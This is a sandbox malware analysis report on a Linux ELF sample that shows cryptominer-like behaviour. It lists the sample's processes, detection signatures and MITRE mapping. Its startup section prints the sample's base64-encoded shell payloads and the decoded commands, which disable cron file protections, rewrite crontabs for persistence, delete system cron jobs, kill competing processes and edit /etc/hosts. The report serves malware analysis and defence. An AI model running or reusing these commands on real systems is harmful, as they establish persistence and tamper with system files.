ID: 198785 Sample Name: RCxcx0vm78.bin Cookbook: defaultlinuxfilecookbook.jbs Time: 19:29:51 Date: 02/01/2020 Version: 28.0.0 Lapis Lazuli Table of Contents
Table of Contents 2 Analysis Report RCxcx0vm78.bin 7 Overview 7 General Information 7 Detection 7 Classification 7 Mitre Att&ck Matrix 8 Signature Overview 9 Bitcoin Miner: 9 System Summary: 9 Persistence and Installation Behavior: 9 Hooking and other Techniques for Hiding and Protection: 9 Malware Analysis System Evasion: 9 Lowering of HIPS / PFW / Operating System Security Settings: 9 Malware Configuration 9 Runtime Messages 10 Behavior Graph 10 Yara Overview 10 Initial Sample 10 PCAP (Network Traffic) 10 Dropped Files 10 Sigma Overview 11 Joe Sandbox View / Context 11 IPs 11 Domains 11 ASN 11 JA3 Fingerprints 11 Dropped Files 11 Antivirus, Machine Learning and Genetic Malware Detection 11 Initial Sample 11 Dropped Files 11 Domains 11 URLs 11 Startup 11 Created / dropped Files 13 Domains and IPs 14 Contacted Domains 14 Contacted IPs 14 Static File Info 14 General 14 Static ELF Info 15 ELF header 15 Program Segments 15 Network Behavior 15 UDP Packets 15 System Behavior 15 Analysis Process: RCxcx0vm78.bin PID: 20750 Parent PID: 20707 15 General 15 File Activities 15 File Deleted 15 Analysis Process: RCxcx0vm78.bin PID: 20757 Parent PID: 20750 15 General 15 Analysis Process: sh PID: 20757 Parent PID: 20750 16 General 16 File Activities 16 File Read 16 Analysis Process: sh PID: 20761 Parent PID: 20757 16 General 16 Analysis Process: sh PID: 20762 Parent PID: 20757 16
Copyright Joe Security LLC 2020 Page 2 of 38 General 16 Analysis Process: base64 PID: 20762 Parent PID: 20757 16 General 16 File Activities 17 File Read 17 Analysis Process: sh PID: 20763 Parent PID: 20757 17 General 17 Analysis Process: bash PID: 20763 Parent PID: 20757 17 General 17 File Activities 17 File Read 17 Analysis Process: bash PID: 20776 Parent PID: 20763 17 General 17 Analysis Process: ls PID: 20776 Parent PID: 20763 17 General 17 File Activities 18 File Read 18 Directory Enumerated 18 Analysis Process: bash PID: 20781 Parent PID: 20763 18 General 18 Analysis Process: mkdir PID: 20781 Parent PID: 20763 18 General 18 File Activities 18 File Read 18 Directory Created 18 Analysis Process: RCxcx0vm78.bin PID: 20790 Parent PID: 20750 18 General 18 File Activities 18 File Written 18 Analysis Process: RCxcx0vm78.bin PID: 20796 Parent PID: 20790 18 General 18 Analysis Process: sh PID: 20796 Parent PID: 20790 19 General 19 File Activities 19 File Read 19 Analysis Process: sh PID: 20801 Parent PID: 20796 19 General 20 Analysis Process: sh PID: 20802 Parent PID: 20796 20 General 20 Analysis Process: base64 PID: 20802 Parent PID: 20796 20 General 20 File Activities 20 File Read 20 Analysis Process: sh PID: 20803 Parent PID: 20796 20 General 20 Analysis Process: bash PID: 20803 Parent PID: 20796 20 General 20 File Activities 21 File Read 21 File Written 21 Directory Enumerated 21 Analysis Process: bash PID: 20825 Parent PID: 20803 21 General 21 Analysis Process: find PID: 20825 Parent PID: 20803 21 General 21 File Activities 21 File Read 21 Analysis Process: bash PID: 20826 Parent PID: 20803 21 General 21 Analysis Process: xargs PID: 20826 Parent PID: 20803 21 General 21 File Activities 22 File Read 22 Directory Enumerated 22 Analysis Process: xargs PID: 20832 Parent PID: 20826 22 General 22 File Activities 22 Directory Enumerated 22 Analysis Process: fuser PID: 20832 Parent PID: 20826 22 General 22 File Activities 22 File Read 22 Analysis Process: bash PID: 20859 Parent PID: 20803 22
Copyright Joe Security LLC 2020 Page 3 of 38 General 22 File Activities 22 Directory Enumerated 22 Analysis Process: find PID: 20859 Parent PID: 20803 23 General 23 File Activities 23 File Read 23 Directory Enumerated 23 Analysis Process: bash PID: 20860 Parent PID: 20803 23 General 23 Analysis Process: xargs PID: 20860 Parent PID: 20803 23 General 23 File Activities 23 File Read 23 Directory Enumerated 23 Analysis Process: xargs PID: 20876 Parent PID: 20860 23 General 23 File Activities 24 Directory Enumerated 24 Analysis Process: chattr PID: 20876 Parent PID: 20860 24 General 24 File Activities 24 File Read 24 Analysis Process: bash PID: 20885 Parent PID: 20803 24 General 24 File Activities 24 Directory Enumerated 24 Analysis Process: find PID: 20885 Parent PID: 20803 24 General 24 File Activities 24 File Read 24 Directory Enumerated 24 Analysis Process: bash PID: 20886 Parent PID: 20803 25 General 25 Analysis Process: xargs PID: 20886 Parent PID: 20803 25 General 25 File Activities 25 File Read 25 Directory Enumerated 25 Analysis Process: xargs PID: 20904 Parent PID: 20886 25 General 25 File Activities 25 Directory Enumerated 25 Analysis Process: chattr PID: 20904 Parent PID: 20886 25 General 25 File Activities 25 File Read 26 Analysis Process: bash PID: 20909 Parent PID: 20803 26 General 26 Analysis Process: crontab PID: 20909 Parent PID: 20803 26 General 26 File Activities 26 File Read 26 Analysis Process: bash PID: 20910 Parent PID: 20803 26 General 26 Analysis Process: grep PID: 20910 Parent PID: 20803 26 General 26 File Activities 26 File Read 26 Analysis Process: bash PID: 20911 Parent PID: 20803 27 General 27 Analysis Process: crontab PID: 20911 Parent PID: 20803 27 General 27 File Activities 27 File Read 27 File Written 27 File Moved 27 Permission Modified 27 Analysis Process: bash PID: 20994 Parent PID: 20803 27 General 27 File Activities 27 Directory Enumerated 27 Analysis Process: grep PID: 20994 Parent PID: 20803 27 General 27
Copyright Joe Security LLC 2020 Page 4 of 38 File Activities 28 File Read 28 Directory Enumerated 28 Analysis Process: bash PID: 20995 Parent PID: 20803 28 General 28 Analysis Process: cut PID: 20995 Parent PID: 20803 28 General 28 File Activities 28 File Read 28 Analysis Process: bash PID: 20996 Parent PID: 20803 28 General 28 Analysis Process: xargs PID: 20996 Parent PID: 20803 28 General 28 File Activities 29 File Read 29 Directory Enumerated 29 Analysis Process: xargs PID: 21009 Parent PID: 20996 29 General 29 File Activities 29 Directory Enumerated 29 Analysis Process: rm PID: 21009 Parent PID: 20996 29 General 29 File Activities 29 File Deleted 29 File Read 29 Analysis Process: bash PID: 21023 Parent PID: 20803 29 General 29 Analysis Process: pkill PID: 21023 Parent PID: 20803 30 General 30 File Activities 30 File Read 30 Directory Enumerated 30 Analysis Process: bash PID: 21059 Parent PID: 20803 30 General 30 Analysis Process: netstat PID: 21059 Parent PID: 20803 30 General 30 File Activities 30 File Read 30 Directory Enumerated 30 Analysis Process: bash PID: 21060 Parent PID: 20803 30 General 30 Analysis Process: grep PID: 21060 Parent PID: 20803 31 General 31 File Activities 31 File Read 31 Analysis Process: bash PID: 21061 Parent PID: 20803 31 General 31 Analysis Process: awk PID: 21061 Parent PID: 20803 31 General 31 File Activities 31 File Read 31 Analysis Process: bash PID: 21062 Parent PID: 20803 32 General 32 Analysis Process: cut PID: 21062 Parent PID: 20803 32 General 32 File Activities 32 File Read 32 Analysis Process: bash PID: 21063 Parent PID: 20803 32 General 32 Analysis Process: xargs PID: 21063 Parent PID: 20803 32 General 32 File Activities 32 File Read 32 Directory Enumerated 32 Analysis Process: xargs PID: 21104 Parent PID: 21063 33 General 33 File Activities 33 Directory Enumerated 33 Analysis Process: kill PID: 21104 Parent PID: 21063 33 General 33 File Activities 33 File Read 33 Analysis Process: bash PID: 21105 Parent PID: 20803 33 General 33 Copyright Joe Security LLC 2020 Page 5 of 38 Analysis Process: rm PID: 21105 Parent PID: 20803 33 General 33 File Activities 33 File Deleted 33 File Read 34 Analysis Process: bash PID: 21106 Parent PID: 20803 34 General 34 Analysis Process: cat PID: 21106 Parent PID: 20803 34 General 34 File Activities 34 File Read 34 Analysis Process: bash PID: 21107 Parent PID: 20803 34 General 34 Analysis Process: cat PID: 21107 Parent PID: 20803 34 General 34 File Activities 34 File Read 34 Analysis Process: bash PID: 21108 Parent PID: 20803 35 General 35 Analysis Process: grep PID: 21108 Parent PID: 20803 35 General 35 File Activities 35 File Read 35 Analysis Process: bash PID: 21109 Parent PID: 20803 35 General 35 Analysis Process: grep PID: 21109 Parent PID: 20803 35 General 35 File Activities 35 File Read 35 Analysis Process: bash PID: 21110 Parent PID: 20803 35 General 36 Analysis Process: grep PID: 21110 Parent PID: 20803 36 General 36 File Activities 36 File Read 36 Analysis Process: bash PID: 21111 Parent PID: 20803 36 General 36 Analysis Process: grep PID: 21111 Parent PID: 20803 36 General 36 File Activities 36 File Read 36 Analysis Process: bash PID: 21112 Parent PID: 20803 36 General 36 Analysis Process: grep PID: 21112 Parent PID: 20803 37 General 37 File Activities 37 File Read 37 Analysis Process: bash PID: 21114 Parent PID: 20803 37 General 37 Analysis Process: grep PID: 21114 Parent PID: 20803 37 General 37 File Activities 37 File Read 37 Analysis Process: bash PID: 21117 Parent PID: 20803 37 General 37 Analysis Process: grep PID: 21117 Parent PID: 20803 38 General 38 File Activities 38 File Read 38
Copyright Joe Security LLC 2020 Page 6 of 38 Analysis Report RCxcx0vm78.bin
Overview
General Information
Joe Sandbox Version: 28.0.0 Lapis Lazuli Analysis ID: 198785 Start date: 02.01.2020 Start time: 19:29:51 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 2m 17s Hypervisor based Inspection enabled: false Report type: light Sample file name: RCxcx0vm78.bin Cookbook file name: defaultlinuxfilecookbook.jbs Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) Detection: MAL Classification: mal52.troj.evad.linBIN@0/3@0/0 Warnings: Show All
Detection
Strategy Score Range Reporting Whitelisted Detection
Threshold 52 0 - 100 false
Classification
Copyright Joe Security LLC 2020 Page 7 of 38 Ransomware
Miner Spreading
mmaallliiiccciiioouusss
malicious
Evader Phishing
sssuusssppiiiccciiioouusss
suspicious
cccllleeaann
clean
Exploiter Banker
Spyware Trojan / Bot
Adware
Mitre Att&ck Matrix
Remote Initial Privilege Defense Credential Lateral Command Network Service Access Execution Persistence Escalation Evasion Access Discovery Movement Collection Exfiltration and Control Effects Effects Valid Local Job Local Job Port Hidden Files Credential Security Application Data from Data Data Eavesdrop on Remotely Accounts Scheduling 2 Scheduling 2 Monitors and Dumping 1 Software Deployment Local Compressed Obfuscation Insecure Track Device Directories 1 Discovery 1 Software System Network Without Communication Authorization Replication Command- Hidden Files Accessibility File and Network System Remote Data from Exfiltration Fallback Exploit SS7 to Remotely Through Line and Features Directory Sniffing Information Services Removable Over Other Channels Redirect Phone Wipe Data Removable Interface 1 Directories 1 Permissions Discovery 1 Media Network Calls/SMS Without Media Modification 1 Medium Authorization External Scripting 1 Accessibility Path Scripting 1 Input Query Windows Data from Automated Custom Exploit SS7 to Obtain Remote Features Interception Capture Registry Remote Network Exfiltration Cryptographic Track Device Device Services Management Shared Protocol Location Cloud Drive Backups Drive-by Scheduled System DLL Search File Credentials System Logon Input Data Multiband SIM Card Compromise Task Firmware Order Deletion 1 1 in Files Network Scripts Capture Encrypted Communication Swap Hijacking Configuration Discovery
Copyright Joe Security LLC 2020 Page 8 of 38 Signature Overview
• Bitcoin Miner • System Summary • Persistence and Installation Behavior • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • Lowering of HIPS / PFW / Operating System Security Settings
Click to jump to signature section
Bitcoin Miner:
Reads CPU information from /sys indicative of miner or evasive malware
System Summary:
Sample contains only a LOAD segment without any section mappings
Classification label
Persistence and Installation Behavior:
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Counts the number of processes currently running
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "kill" command typically used to terminate processes
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "awk" command used to scan for patterns (typically in standard output)
Hooking and other Techniques for Hiding and Protection:
Sample deletes itself
Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Malware Analysis System Evasion:
Reads CPU information from /sys indicative of miner or evasive malware
Uses the "uname" system call to query kernel version information (possible evasion)
Lowering of HIPS / PFW / Operating System Security Settings:
Removes protection from files
Malware Configuration Copyright Joe Security LLC 2020 Page 9 of 38 No configs have been found
Runtime Messages
Command: /tmp/RCxcx0vm78.bin Exit Code: 0 Exit Code Info: Killed: False Standard Output: Standard Error:
Behavior Graph
Hide Legend Behavior Graph ID: 198785 Legend: Sample: RCxcx0vm78.bin Startdate: 02/01/2020 Process Architecture: LINUX Score: 52 Signature
started Created File RCxcx0vm78.bin DNS/IP Info Is Dropped
Number of created Files Sample deletes itself started started Is malicious
RCxcx0vm78.bin RCxcx0vm78.bin Internet sh
started started started started
RCxcx0vm78.bin sh sh sh sh bash base64
started started started started started
sh sh bash bash sh bash base64 ls mkdir
started started started
bash bash bash crontab crontab xargs
25 other processes
dropped
/var/spool/cron/crontabs/tmp.pKGrnA, ASCII
started started started started started
Executes the "crontab" Sample tries to persist command typically for itself using cron achieving persistence
xargs xargs xargs xargs xargs fuser rm kill chattr chattr
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Copyright Joe Security LLC 2020 Page 10 of 38 Sigma Overview
No Sigma rule has matched
Joe Sandbox View / Context
IPs
No context
Domains
No context
ASN
No context
JA3 Fingerprints
No context
Dropped Files
No context
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Source Detection Scanner Label Link RCxcx0vm78.bin 3% Virustotal Browse
Dropped Files
No Antivirus matches
Domains
No Antivirus matches
URLs
No Antivirus matches
Startup
system is lnxubuntu1 RCxcx0vm78.bin (PID: 20750, Parent: 20707, MD5: unknown) Arguments: /tmp/RCxcx0vm78.bin RCxcx0vm78.bin New Fork (PID: 20757, Parent: 20750) sh (PID: 20757, Parent: 20750, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA;echo bHMgL3RtcC8uWDExLXVuaXggfHwgbWtkaXIgLXAgL3RtcC8uWDExLXVuaXgK|base64 -d|bash" sh New Fork (PID: 20761, Parent: 20757)
Copyright Joe Security LLC 2020 Page 11 of 38 sh New Fork (PID: 20762, Parent: 20757) base64 (PID: 20762, Parent: 20757, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d sh New Fork (PID: 20763, Parent: 20757) bash (PID: 20763, Parent: 20757, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: bash bash New Fork (PID: 20776, Parent: 20763) ls (PID: 20776, Parent: 20763, MD5: f3b92d795c9ee0725c160680acd084d9) Arguments: ls /tmp/.X11-unix bash New Fork (PID: 20781, Parent: 20763) mkdir (PID: 20781, Parent: 20763, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /tmp/.X11-unix RCxcx0vm78.bin New Fork (PID: 20790, Parent: 20750) RCxcx0vm78.bin New Fork (PID: 20796, Parent: 20790) sh (PID: 20796, Parent: 20790, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KZmluZCB+Ly5 kZGcvKnx4YXJncyBmdXNlciAtawpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pCmZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWkKY3JvbnRhYiAtbCB 8Z3JlcCAtaXZFICIuXC9va2F8XC91cGR8YWxpeXVufGN1cmx8anF1ZXIuanN8a2lsbF9tfG1tbXxzeXN0ZW1kfHRtcDAwfHRyb2phbnx0cnVtcHx2aXJ1c3x3Z2V0fHgxfHgxMSJ8Y 3JvbnRhYiAtCmdyZXAgLVJFICIuXC9va2F8XC91cGR8YWxpeXVufGN1cmx8anF1ZXIuanN8a2lsbF9tfG1tbXxze" kfHRtcDAwfHRyb2phbnx0cnVtcHx2aXJ1c3x3Z2V0fHgxfHgxMSIgL2V0Yy9jcm9uLip8Y3V0IC1mIDEgLWQgOnx4YXJncyBybSAtZgpwa2lsbCAtOSAtZiAiLi9jcm9ufC4vb2thfC90b XAvZGRnc3wvdG1wL2lka3wvdG1wL2phdmF8L3RtcC9rZWVwfC90bXAvdWRldnN8L3RtcC91ZGt8L3RtcC91cGRhdGUuc2h8L3RtcC95YXJufC91c3IvYmluL25ldGZzfDgyMjB8Q WxpSGlkc3xBbGlZdW5EdW58RG9uYWxkfEhUOHN8Sm9uYXNvbnxTemRYTXxYMTMtdW5peHxYMTctdW5peHxcW3N0ZWFcXXxhZWdpc198YWxpeXVuLXNlcnZpY2V8YXp pcGx8Y3Iuc2h8Y3Jsb2dlcnxjcm9uZHN8Y3J1bnxjcnlwdG9uaWdodHxjdXJufGN1cnJufGRkZ3N8ZGhjbGVpbnR8ZnMtbWFuYWdlc yOG11bHxoYXZlZ2Vkc3xodHRwZHp8aXJxYmFsYW5jZWR8amF2YS1jfGthdWRpdGVkfGtlcmJlcm9kc3xraHVnZXBhZ2Vkc3xraW50ZWdyaXR5ZHN8a3BzbW91c2Vkc3xrc3dhc GVkfGt0aHJvdGxkc3xrdzB8a3dvcmtlcmRzfGt3b3JrcmV8a3dyb2tlcnxtZXdyc3xtaWdyYXRpb25zfG1pbmVyfG1tbXxtci5zaHxtdWhzdGl8bXlnaXR8bmV0ZG5zfG5ldHdvcmtzZXJ2 aWNlfG9yZ2ZzfHBhbWRpY2tzfHBhc3RlYmlufHFXM3hUfHF3ZWZkYXN8cmN0bGNsaXxzbGVlcHxzdHJhdHVtfHN1c3Rlc3xzdXN0c2V8c3lzZ3VhcmR8c3lzdGVhbWR8c3lzdGVt ZC1uZXR3b3JrfHN5c3VwZGF0ZXx0MDBsc3x0aGlzeHhzfFRydW1wfHVwZGF0ZS5zaHx2VHRISHx3YXRjaGJvZ3x3YXRja 3YXRjaG9nfHdpcGVmc3x3blRLWWd8eDNXcXx4aWd8eG1yfHplcjAiCm5ldHN0YXQgLWFudHB8Z3JlcCAtRSAiMTAzLjMuNjIuNjR8MTA0LjE0MC4yMDEuMTAyfDEwNC4xNDA uMjAxLjQyfDEwNC4xNDAuMjAxLjU4fDEwNC4xNDAuMjAxLjYyfDEwNC4xNDAuMjQ0LjE4NnwxMDcuMTkxLjk5LjIyMXwxMDcuMTkxLjk5Ljk1fDExOS45Ljc2LjEwN3wxMjMuNTk uMjMyLjQyfDEzMS4xNTMuNTYuOTh8MTMxLjE1My43Ni4xMzB8MTM4LjIwMS4zNi4yNDl8MTM5LjE2Mi44MS45MHwxMzkuOTkuMTAxLjE5N3wxMzkuOTkuMTAxLjE5OHwxM zkuOTkuMTAxLjIzMnwxMzkuOTkuMTAyLjcwfDEzOS45OS4xMDIuNzF8MTM5Ljk5LjEwMi43MnwxMzkuOTkuMTAyLjczfDEzOS45OS4xMDIuN 5Ljk5LjEyMC41MHwxMzkuOTkuMTIwLjczfDEzOS45OS4xMjAuNzV8MTM5Ljk5LjEyMy4xOTZ8MTM5Ljk5LjEyNC4xNzB8MTM5Ljk5LjEyNS4zOHwxMzkuOTkuMTU2LjMwfDEz OS45OS42OC4xMjh8MTQyLjQ0LjI0Mi4xMDB8MTQyLjQ0LjI0My42fDE0NC4yMTcuMTQuMTA5fDE0NC4yMTcuMTQuMTM5fDE0OS4yMDIuNDIuMTc0fDE0OS4yMDIuODMuM TcxfDE1MS44MC4xNDQuMTg4fDE1MS44MC4xNDQuMjUzfDE1OC42OS4yNS43MXwxNTguNjkuMjUuNzd8MTY0LjEzMi4xMDkuMTEwfDE3Mi4xMDQuMTY1LjE5MXwxNzIuM TA1LjIxMS4yNTB8MTcyLjgzLjE1NS4xNTE6ODB8MTc4LjYzLjEwMC4xOTd8MTkyLjk5LjY5LjE3MHwyMDcuMjQ2LjEwMC4xOTh8MjEzLjMyLjI5LjE0M uMzIuNzQuMTU3fDIxNy4xODIuMTY5LjE0OHwzNy4xODcuMTU0Ljc5fDM3LjE4Ny45NS4xMTB8MzcuNTkuNDMuMTMxfDM3LjU5LjQzLjEzNnwzNy41OS40NC4xOTN8MzcuNT kuNDQuOTN8MzcuNTkuNDUuMTc0fDM3LjU5LjU0LjIwNXwzNy41OS41NS42MHwzNy45LjMuMjZ8NDUuMzIuNzEuODJ8NDUuNzYuNjUuMjIzfDQ3LjEwMS4zMC4xMjR8NTEu MTUuNTQuMTAyfDUxLjE1LjU1LjEwMHw1MS4xNS41NS4xNjJ8NTEuMTUuNTguMjI0fDUxLjE1LjY1LjE4Mnw1MS4xNS42Ny4xN3w1MS4xNS42OS4xMzZ8NTEuMTUuNzguNjh 8NTEuMjU1LjM0LjExOHw1MS4yNTUuMzQuNzl8NTEuMjU1LjM0LjgwfDUuMTk2LjEzLjI5fDUuMTk2LjIzLjI0MHw1LjE5Ni4yNi45Nnw1NC4zNy43L 2MS4xNTUuMjIxLjc0fDY2LjQyLjEwNS4xNDZ8NzkuMTM3LjgyLjV8ODguOTkuMTkzLjI0MHw4OC45OS4yNDIuOTJ8OTEuMTIxLjE0MC4xNjd8OTEuMTIxLjIuNzZ8OTIuMjIyLjEw LjU5fDkyLjIyMi4xODAuMTE5fDk0LjEzMC4xMi4yN3w5NC4xMzAuMTIuMzB8OTQuMTMwLjE2NS44NXw5NC4xMzAuMTY1Ljg3fDk0LjIzLjIzLjUyfDk0LjIzLjI0Ny4yMjYifGF3ayB7 J3ByaW50ICRORid9IHxjdXQgLWQvIC1mMXx4YXJncyBraWxsIC05CnJtIC1mIH4vLnthbGl5dW4qLHN5c3RlbWQqLHRtcCosdHJ1bXAqLHdnZXQqfSAvZXRjL2Nyb24uZC97Km FsaXl1biosKnN5c3RlbWQqLCp0cnVtcCp9IC9vcHQveyphbGl5dW4qLCpzeXN0ZW1kKiwqdHJ1bXAqfSAKa2lsbCAtOSAkK vdG1wLy5YMTEtdW5peC8wMSkKa2lsbCAtOSAkKGNhdCAvdG1wLy5YMTEtdW5peC8wKQpncmVwIC1xIHRydW1wIC9ldGMvaG9zdHMgJiYgc2VkIC1pICcvdHJ1bXAvZCcgL2 V0Yy9ob3N0cwpncmVwIC1xIHRvcjJ3IC9ldGMvaG9zdHMgJiYgc2VkIC1pICcvdG9yMncvZCcgL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIGFsaXl1bi5vbmUiIC9ldGMvaG9z dHMgfHwgZWNobyAiMC4wLjAuMCBhbGl5dW4ub25lIiA+PiAvZXRjL2hvc3RzCmdyZXAgLXEgIjAuMC4wLjAgbHNkLnN5c3RlbXRlbi5vcmciIC9ldGMvaG9zdHMgfHwgZWNobyAi MC4wLjAuMCBsc2Quc3lzdGVtdGVuLm9yZyIgPj4gL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIHBhc3RlYmluLmNvbSIgL2V0Y "0cyB8fCBlY2hvICIwLjAuMC4wIHBhc3RlYmluLmNvbSIgPj4gL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIHBtLmNwdW1pbmVycG9vbC5jb20iIC9ldGMvaG9zdHMgfHwgZW NobyAiMC4wLjAuMCBwbS5jcHVtaW5lcnBvb2wuY29tIiA+PiAvZXRjL2hvc3RzCmdyZXAgLXEgIjAuMC4wLjAgc3lzdGVtdGVuLm9yZyIgL2V0Yy9ob3N0cyB8fCBlY2hvICIwLjAuM C4wIHN5c3RlbXRlbi5vcmciID4+IC9ldGMvaG9zdHMKCg== |base64 -d|bash" sh New Fork (PID: 20801, Parent: 20796) sh New Fork (PID: 20802, Parent: 20796) base64 (PID: 20802, Parent: 20796, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d sh New Fork (PID: 20803, Parent: 20796) bash (PID: 20803, Parent: 20796, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: bash bash New Fork (PID: 20825, Parent: 20803) find (PID: 20825, Parent: 20803, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /home/user/.ddg/* bash New Fork (PID: 20826, Parent: 20803) xargs (PID: 20826, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs fuser -k xargs New Fork (PID: 20832, Parent: 20826) fuser (PID: 20832, Parent: 20826, MD5: d2e863e32c9f969b17d78c175daadbae) Arguments: fuser -k bash New Fork (PID: 20859, Parent: 20803) find (PID: 20859, Parent: 20803, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/crontab /etc/cron.weekly bash New Fork (PID: 20860, Parent: 20803) xargs (PID: 20860, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs chattr -i xargs New Fork (PID: 20876, Parent: 20860) chattr (PID: 20876, Parent: 20860, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i /etc/cron.d /etc/cron.d/popularity-contest /etc/cron.d/mdadm /etc/cron.d/php /etc/cron.d/.placeholder /etc/cron.d/anacron /etc/cron.daily /etc/cron.daily/man-db /etc/cron.daily/cracklib-runtime /etc/cron.daily/passwd /etc/cron.daily/popularity-contest /etc/cron.daily/0anacron /etc/cron.daily/bsdmainutils /etc/cron.daily/mdadm /etc/cron.daily/upstart /etc/cron.daily/mlocate /etc/cron.daily/.placeholder /etc/cron.daily/apt-compat /etc/cron.daily/update-notifier-common /etc/cron.daily/logrotate /etc/cron.daily/dpkg /etc/cron.daily/apport /etc/cron.hourly /etc/cron.hourly/.placeholder /etc/cron.monthly /etc/cron.monthly/0anacron /etc/cron.monthly/.placeholder /etc/crontab /etc/cron.weekly /etc/cron.weekly/fstrim /etc/cron.weekly/man-db /etc/cron.weekly/0anacron /etc/cron.weekly/.placeholder /etc/cron.weekly/update-notifier-common bash New Fork (PID: 20885, Parent: 20803) find (PID: 20885, Parent: 20803, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /var/spool/cron bash New Fork (PID: 20886, Parent: 20803) xargs (PID: 20886, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs chattr -i xargs New Fork (PID: 20904, Parent: 20886) chattr (PID: 20904, Parent: 20886, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i /var/spool/cron /var/spool/cron/crontabs /var/spool/cron/atjobs /var/spool/cron/atjobs/.SEQ /var/spool/cron/atspool bash New Fork (PID: 20909, Parent: 20803) crontab (PID: 20909, Parent: 20803, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l bash New Fork (PID: 20910, Parent: 20803) grep (PID: 20910, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -ivE .\\/oka|\\/upd|aliyun|curl|jquer.js|kill_m|mmm|systemd|tmp00|trojan|trump|virus|wget|x1|x11 bash New Fork (PID: 20911, Parent: 20803) crontab (PID: 20911, Parent: 20803, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab - bash New Fork (PID: 20994, Parent: 20803) grep (PID: 20994, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -RE .\\/oka|\\/upd|aliyun|curl|jquer.js|kill_m|mmm|systemd|tmp00|trojan|trump|virus|wget|x1|x11 /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly bash New Fork (PID: 20995, Parent: 20803) cut (PID: 20995, Parent: 20803, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -f 1 -d : bash New Fork (PID: 20996, Parent: 20803) xargs (PID: 20996, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs rm -f xargs New Fork (PID: 21009, Parent: 20996) Copyright Joe Security LLC 2020 Page 12 of 38 rm (PID: 21009, Parent: 20996, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -f /etc/cron.daily/man-db /etc/cron.daily/cracklib-runtime /etc/cron.daily/cracklib-runtime /etc/cron.daily/mlocate /etc/cron.daily/mlocate /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/update-notifier-common /etc/cron.daily/update-notifier-common bash New Fork (PID: 21023, Parent: 20803) pkill (PID: 21023, Parent: 20803, MD5: f3b843351a404d4e8d4ce0ed0775fa9c) Arguments: pkill -9 -f ./cron|./oka|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliYunDun|Donald|HT8s|Jonason|SzdXM|X 13-unix|X17-unix|\\[stea\\]|aegis_|aliyun-service|azipl|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs- manager|gf128mul|havegeds|httpdz|irqbalanced|java- c|kaudited|kerberods|khugepageds|kintegrityds|kpsmouseds|kswaped|kthrotlds|kw0|kworkerds|kworkre|kwroker|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns |networkservice amdicks|pastebin|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|systeamd|systemd- network|sysupdate|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0 bash New Fork (PID: 21059, Parent: 20803) netstat 